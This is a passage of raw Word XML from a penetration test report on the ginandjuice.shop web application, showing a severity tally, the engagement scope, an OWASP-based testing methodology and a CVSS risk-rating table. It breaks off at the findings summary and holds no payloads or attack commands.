                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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667CB332" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>29%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="0BE14341" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4400" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B45309"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10BABF8C" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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6753275D" w14:textId="2DE1FBE4" w:rsidR="00514271" w:rsidRDefault="00A569E6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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7C19FBE4" w14:textId="743D7353" w:rsidR="00514271" w:rsidRDefault="00A569E6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
            <w:r w:rsidR="00877F8D">
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="27D49742" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4400" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1D4ED8"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BDDDDF7" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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69994643" w14:textId="260AD33E" w:rsidR="00514271" w:rsidRDefault="00A569E6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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38296A02" w14:textId="027FDA96" w:rsidR="00514271" w:rsidRDefault="00A569E6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="00877F8D">
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="2C41EDD7" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4400" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="374151"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21BB9239" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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33E566FB" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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02AC6F99" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>14%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="784E1FDB" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="682901BA" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="4" w:color="1F2937"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Engagement Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08342F70" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>In-Scope Assets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550CA09F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Web application: https://ginandjuice.shop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607AD1CC" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Endpoints tested: /catalog, /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>catalog?category</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=, /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>catalog?searchTerm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=, /login, /blog/?search=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CF5760" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Testing Window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4757D6AA" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Testing was conducted over the course of the engagement window agreed </w:t>
      </w:r>
      <w:r>
        <w:t>with the client, using manual testing supplemented by targeted scripting for brute-force validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD31AF7" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Testing Approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BE3C17" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This assessment was conducted as a grey-box test with valid low-privilege application credentials, simulating an authenticated user attemp</w:t>
      </w:r>
      <w:r>
        <w:t>ting to escalate access or extract data beyond their intended privileges, as well as an unauthenticated attacker probing public-facing input fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D140757" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="546A44EF" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="4" w:color="1F2937"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE364BC" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Testing followed a structured methodology aligned with industry-standard frameworks, inclu</w:t>
      </w:r>
      <w:r>
        <w:t>ding the OWASP Testing Guide (OWASP WSTG) and OWASP Top 10. The following phases were performed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9C46F5" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Reconnaissance &amp; Mapping — enumeration of application endpoints, parameters, and input surfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5AE37E" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Automated &amp; Manual Input Testing — fuzzing of query parameters for injection classes (SQLi, XSS, template injection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD64558" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Authentication Testing — review of login </w:t>
      </w:r>
      <w:r>
        <w:t>flow, CSRF token handling, and rate-limiting / account lockout controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032F2261" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Configuration Review — inspection of HTTP response headers and third-party library versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42469BCF" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Validation &amp; Evidence Collection — manual confirmation of each issue with request/response</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> evidence captured via browser </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DevTools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and Python-based scripting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D4335D" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC33520" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="4" w:color="1F2937"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4. Risk Rating Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D9EB42" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Each finding is rated using CVSS v3.1 base scores combined with contextual business-impact analysis. The mapping used throughout this report is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8"/>
        <w:gridCol w:w="3358"/>
        <w:gridCol w:w="3358"/>
      </w:tblGrid>
      <w:tr w:rsidR="00514271" w14:paraId="5C18E21E"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shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E232C9F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2673D476" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CVSS 3.1 Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44AA80B8" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Color</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="06B1538B"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41A7797B" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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50EC42B1" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>9.0 – 10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7F1D1D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12C7666E" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="7017B4FD"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5BDEBD35" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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0B0D7F8F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>7.0 – 8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B91C1C"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1FE35A9B" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="1C9C201D"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58872F17" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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552675D2" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>4.0 – 6.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B45309"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F82EBC8" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="295FA2C7"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2C88C4D0" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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15F335F5" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>0.1 – 3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1D4ED8"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E69BC0A" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="37FFCC33" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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54F46949" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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3F77E9D0" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="374151"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7651B7A9" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B499977" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="01915B60" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="4" w:color="1F2937"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5. Summary of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4599"/>
        <w:gridCol w:w="2081"/>
        <w:gridCol w:w="2300"/>
      </w:tblGrid>
